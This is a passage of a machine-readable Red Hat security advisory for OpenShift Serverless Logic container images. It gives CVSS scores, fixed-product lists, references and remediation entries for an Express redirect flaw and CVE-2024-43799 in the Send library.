"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", 